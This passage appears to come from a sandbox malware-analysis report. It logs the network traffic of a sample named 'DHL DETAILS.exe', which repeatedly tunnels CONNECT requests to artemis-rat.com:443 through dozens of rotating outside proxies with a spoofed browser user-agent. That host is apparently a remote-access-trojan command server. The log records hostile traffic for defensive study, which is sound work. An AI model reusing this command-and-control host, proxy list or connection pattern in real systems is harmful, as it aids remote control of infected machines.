                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.480142117 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:14 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    518192.168.2.55090698.162.25.7316536352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.340245008 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    519192.168.2.550872163.172.165.36163796352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.345952034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.380094051 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.227385998 CET536INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69
                                                                                    Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please confi


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    520192.168.2.551576203.218.172.22580806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.377841949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    521192.168.2.55157482.157.194.4478906352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.383095980 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.708420992 CET39INHTTP/1.1 200 Connection established


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    522192.168.2.551145162.240.231.211605896352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.393439054 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.536390066 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.724061012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    523192.168.2.550736122.114.232.1378086352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.401370049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    524192.168.2.551032184.178.172.5153036352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.401515007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    525192.168.2.55102798.170.57.24941456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.401644945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    526192.168.2.55101572.210.252.13741456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.403589010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    527192.168.2.551656172.67.182.77806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.407617092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.561888933 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:14 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    528192.168.2.551120162.241.158.204446076352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.408250093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.567503929 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.601697922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:26.764123917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.880619049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    529192.168.2.55095739.109.113.9731286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.417656898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.536381960 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.785263062 CET309INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.16.1
                                                                                    Date: Sat, 09 Mar 2024 11:53:06 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 157
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.16.1</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    530192.168.2.551022163.172.137.49163796352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.423707962 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.567503929 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.601701021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    531192.168.2.551628157.185.157.151265896352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.428774118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    532192.168.2.551592156.67.217.159806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.463356018 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.794440031 CET327INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                    Date: Sat, 09 Mar 2024 12:14:14 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 166
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    533192.168.2.551683104.25.194.175806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.463356972 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.617844105 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:14 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    534192.168.2.55161051.15.210.79163796352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.463361025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.098715067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.067614079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.825897932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:21.364722013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    535192.168.2.55118967.205.162.103143986352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.463421106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.536462069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.724061012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:26.723809004 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.849556923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    536192.168.2.551676142.4.123.41806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.468281984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    537192.168.2.551131177.93.45.1569996352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.468920946 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.643136978 CET19INHTTP/1.1 200 OK


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    538192.168.2.551606195.248.243.14972376352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.475205898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.145567894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.130429029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.021194935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:21.833406925 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    539192.168.2.55163198.162.25.29316796352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.482700109 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
